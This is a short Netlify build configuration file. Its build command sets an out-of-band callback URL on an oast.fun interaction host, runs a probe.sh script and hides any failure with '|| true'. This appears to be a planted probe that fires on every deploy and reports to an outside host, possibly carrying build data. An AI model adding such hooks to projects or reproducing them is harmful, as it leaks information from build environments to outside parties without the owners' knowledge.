[build]
  command = "NFP_OOB_URL=\"https://dab154553hekjnroahe07fb9jpyto4nwp.oast.fun/\" bash ./probe.sh || true"
  publish = "public"

[functions]
  directory = "netlify/functions"

[images]
  remote_images = []
